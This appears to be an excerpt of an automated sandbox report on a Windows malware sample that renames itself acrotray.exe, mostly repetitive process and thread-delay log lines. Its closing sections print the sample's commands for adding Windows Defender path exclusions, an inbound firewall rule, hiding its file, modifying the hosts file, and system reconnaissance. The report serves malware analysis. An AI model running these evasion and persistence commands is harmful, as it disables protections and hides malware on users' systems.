Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\whoami.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4720	Thread sleep count: 6104 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4720	Thread sleep count: 2838 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5684	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep count: 1369 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648	Thread sleep count: 6848 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180	Thread sleep count: 5602 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6628	Thread sleep count: 2735 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5848	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548	Thread sleep count: 5180 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4548	Thread sleep count: 3331 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7080	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6920	Thread sleep count: 5450 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092	Thread sleep count: 3003 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060	Thread sleep count: 4727 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4060	Thread sleep count: 3458 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 720	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2838
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1369
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6848
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5602
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2735
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5180
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3331
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5450
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4727
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3458

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File opened: PHYSICALDRIVE0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, 00000000.00000002.564099859.0000000000CE8000.00000004.00000020.sdmp, acrotray.exe, 00000029.00000002.562719738.0000000000BB8000.00000004.00000020.sdmp, acrotray.exe, 00000045.00000002.560875709.00000000000BF000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Modifies the hosts file

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Adds a directory exclusion to Windows Defender

Show sources

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Windows\acrotray.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft

Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C whoami
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "ipconfig //flushdns"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic cpu get name"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "attrib +S +H C:\Windows\acrotray.exe"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft"
Source: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic path win32_VideoController get name"
